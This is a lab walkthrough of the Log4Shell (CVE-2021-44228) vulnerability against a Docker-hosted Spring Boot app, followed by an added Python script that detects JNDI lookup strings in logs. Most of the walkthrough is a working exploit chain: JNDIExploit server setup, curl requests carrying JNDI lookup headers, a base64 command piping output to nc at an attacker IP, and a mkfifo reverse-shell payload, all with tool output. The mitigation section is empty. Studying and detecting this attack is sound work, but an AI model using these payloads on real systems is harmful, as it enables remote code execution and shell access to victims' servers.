CVE-2021-44228 — Log4Shell
Proof-of-Concept for Critical Apache Log4j Remote Code Execution Vulnerability Available (Log4Shell)
For this exercise I will be targeting a Docker-hosted vulnerable Java application, which you can find here:
https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab
Exploitation:
First we need to encode the command in base64:
└──╼ #echo "ls | nc 172.20.10.2 80" | base64
bHMgfCBuYyAxNzIuMjAuMTAuMiA4MAo=
After that we need to host the vulnerable LDAP server & the HTTP server.
The below jar file will do the following:
- Host LDAP server.
- Host HTTP server.
- Create a .class file based on the base64 payload.
└──╼ #java -jar JNDIExploit-1.2-SNAPSHOT.jar
Error: The following option is required: [-i | --ip]
Usage: java -jar JNDIExploit-1.2-SNAPSHOT.jar [options]
Options:
* -i, --ip Local ip address
-l, --ldapPort Ldap bind port (default: 1389)
-p, --httpPort Http bind port (default: 8080)
-u, --usage Show usage (default: false)
-h, --help Show this help
└──╼ #java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 172.20.10.2 -l 1234 -p 800
[+] LDAP Server Start Listening on 1234...
[+] HTTP Server Start Listening on 800...
Running the exploit with the curl command below sends the address of the malicious LDAP server started in the previous step, together with the base64-encoded command:
└──╼ #curl 172.17.0.1:8080 -H 'X-Api-Version: ${jnd i:ldap://172.20.10.2:1234/Basic/Command/Base64/bHMgfCBuYyAxNzIuMjAuMTAuMiA4MAo=}'
Hello, world!
The LDAP server should receive a request from the victim machine and then redirect it to our malicious HTTP server, which hosts the exploit .class file:
└──╼ #java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 172.20.10.2 -l 1234 -p 800
[+] LDAP Server Start Listening on 1234...
[+] HTTP Server Start Listening on 800...
[+] Received LDAP Query: Basic/Command/Base64/bHMgfCBuYyAxNzIuMjAuMTAuMiA4MAo=
[+] Paylaod: command
[+] Command: ls
| nc 172.20.10.2 80
[+] Sending LDAP ResourceRef result for
Basic/Command/Base64/bHMgfCBuYyAxNzIuMjAuMTAuMiA4MAo= with basic remote reference payload
[+] Send LDAP reference result for
Basic/Command/Base64/bHMgfCBuYyAxNzIuMjAuMTAuMiA4MAo= redirecting to http://172.20.10.2:800/ExploitcjWF0rQsqL.class
[+] New HTTP Request From /172.17.0.2:55030 /ExploitcjWF0rQsqL.class
[+] Receive ClassRequest: ExploitcjWF0rQsqL.class
[+] Response Code: 200
Then we should receive the output of the command as shown below:
└──╼ #nc -lvnp 80
listening on [any] 80 ...
connect to [172.20.10.2] from (UNKNOWN) [172.17.0.2] 33701
app
bin
dev
etc
home
lib
media
mnt
proc
root
run
sbin
srv
sys
tmp
usr
var
Getting Shell:
- Create the payload:
└──╼ #echo "rm f;mkfifo f;cat f|sh -i 2>&1|nc 172.20.10.2 80 >f" | base64
cm0gZjtta2ZpZm8gZjtjYXQgZnxzaCAtaSAyPiYxfG5jIDE3Mi4yMC4xMC4yIDgwID5mCg=
- Send the exploit:
└──╼ #curl 172.17.0.1:8080 -H 'X-Api-Version: ${jn di:ldap://172.20.10.2:1234/Basic/Command/Base64/cm0gZjtta2ZpZm8gZjtjYXQgZnxzaCAtaSAyPiYxfG5jIDE3Mi4yMC4xMC4yIDgwID5mCg==}'
- Finally, get the shell.
Mitigation:
The topology below shows where the attack can be mitigated at each step:
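As an added example that is not part of the original write-up, the following Python script shows the detection side of the flow above: it scans request logs for the JNDI lookup string sent in the X-Api-Version header, extracts the attacker-controlled LDAP callback host and port as an indicator for blocking and hunting, and decodes the JNDIExploit-style `/Base64/` path segment so an incident responder can see which command was attempted. The log lines, their format and the field layout are constructed for this example and are assumptions, not the lab's real logs.

```python
from __future__ import annotations

import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample access-log lines (assumed format; not from the lab).
# Line 2 carries a lookup string shaped like the one in the write-up.
SAMPLE_LOG = """\
172.17.0.2 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 13 "X-Api-Version: 1.0"
172.17.0.2 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 13 "X-Api-Version: ${jndi:ldap://172.20.10.2:1234/Basic/Command/Base64/bHMgfCBuYyAxNzIuMjAuMTAuMiA4MAo=}"
172.17.0.2 - - [10/Dec/2021:12:00:09 +0000] "GET /health HTTP/1.1" 200 2 "curl/7.79.1"
"""

# Matches the ${jndi:<scheme>://host[:port]/path} lookup that Log4j resolves.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>ldaps?|rmi|dns|iiop|corba|nds|http)\s*:/*"
    r"(?P<host>[^:/\s}]+)(?::(?P<port>\d+))?(?P<path>[^}\s]*)",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class JndiHit:
    line_no: int
    scheme: str
    host: str
    port: Optional[int]
    path: str


def scan_log(text: str) -> List[JndiHit]:
    """Return one JndiHit per JNDI lookup string found in the log text."""
    hits: List[JndiHit] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for m in JNDI_LOOKUP.finditer(line):
            port = m.group("port")
            hits.append(
                JndiHit(
                    line_no=line_no,
                    scheme=m.group("scheme").lower(),
                    host=m.group("host"),
                    port=int(port) if port else None,
                    path=m.group("path"),
                )
            )
    return hits


def callback_indicators(hits: List[JndiHit]) -> List[str]:
    """Distinct attacker-controlled host[:port] pairs, sorted, for blocklists."""
    return sorted({f"{h.host}:{h.port}" if h.port else h.host for h in hits})


def decode_jndiexploit_command(path: str) -> Optional[str]:
    """Decode the /Base64/<payload> segment used by JNDIExploit-style paths.

    Tolerates missing '=' padding, which is a common copy/paste artifact.
    Returns None when the path carries no such segment.
    """
    m = re.search(r"/Base64/([A-Za-z0-9+/=]+)", path)
    if not m:
        return None
    payload = m.group(1).rstrip("=")
    payload += "=" * (-len(payload) % 4)
    try:
        return base64.b64decode(payload).decode("utf-8", "replace").strip()
    except (ValueError, base64.binascii.Error):
        return None


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for hit in found:
        print(f"line {hit.line_no}: {hit.scheme}://{hit.host}:{hit.port}")
        print(f"  attempted command: {decode_jndiexploit_command(hit.path)!r}")
    print("callback indicators:", callback_indicators(found))
```

The regex anchors on the literal `jndi` prefix because that is what Log4j's lookup mechanism resolves; a WAF-style filter on the same pattern is a stopgap, and the actual fix is upgrading Log4j so the lookup is never evaluated.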
More vulnerable applications
Minecraft:
Ghidra: